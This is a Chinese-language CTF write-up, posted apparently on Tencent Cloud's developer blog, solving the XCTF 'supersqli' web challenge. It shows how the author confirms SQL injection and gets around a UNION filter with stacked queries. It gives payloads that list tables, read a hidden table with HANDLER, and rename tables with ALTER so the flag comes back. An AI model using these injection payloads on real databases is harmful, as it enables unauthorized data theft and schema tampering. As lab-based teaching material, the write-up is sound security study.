前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >【愚公系列】2022年01月 攻防世界-进阶题-WEB-012(supersqli)

【愚公系列】2022年01月 攻防世界-进阶题-WEB-012(supersqli)

作者头像
愚公搬代码
发布2022-01-25 11:06:46
4370
发布2022-01-25 11:06:46
举报
文章被收录于专栏:历史专栏

文章目录


一、supersqli

题目链接:https://adworld.xctf.org.cn/task/task_list?type=web&number=3&grade=1&page=1

二、使用步骤

1.点击获取在线场景

2.进入场景

输入1’发现不回显,然后1’ #显示正常,判断是存在sql注入了

order by 2的时候是正常回显了,order by 3就出错了,只有2个字段,这时候用1' union select 1,2,#进行联合查询,发现关键字被正则过滤

尝试堆叠注入-1';show tables #

查询两张表名字段

代码语言:javascript
复制
-1';show columns from `1919810931114514` #

-1';show columns from `words` #

3.构造注入语句

第一种方式:

代码语言:javascript
复制
-1';handler `1919810931114514` open;handler `1919810931114514` read first;#

第二种方式:

代码语言:javascript
复制
//修改表
1'; alter table words rename to words1;alter table `1919810931114514` rename to words;alter table words change flag id varchar(50);#
//在查询
1' or 1=1#

总结

知识点总结

  1. MySQL表名为纯数字时(表名和保留字冲突时也是加反引号),要加反引号:show columns from 1919810931114514
  2. MySQL 官方将 prepare、execute、deallocate 统称为 PREPARE STATEMENT,也就是预处理语句
  3. 字符拼接函数可以考虑用来绕过关键字检查
本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2022/01/24 ,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 文章目录
  • 一、supersqli
  • 二、使用步骤
    • 1.点击获取在线场景
      • 2.进入场景
        • 3.构造注入语句
        • 总结
        相关产品与服务
        云数据库 SQL Server
        腾讯云数据库 SQL Server (TencentDB for SQL Server)是业界最常用的商用数据库之一,对基于 Windows 架构的应用程序具有完美的支持。TencentDB for SQL Server 拥有微软正版授权,可持续为用户提供最新的功能,避免未授权使用软件的风险。具有即开即用、稳定可靠、安全运行、弹性扩缩等特点。
        领券
        问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档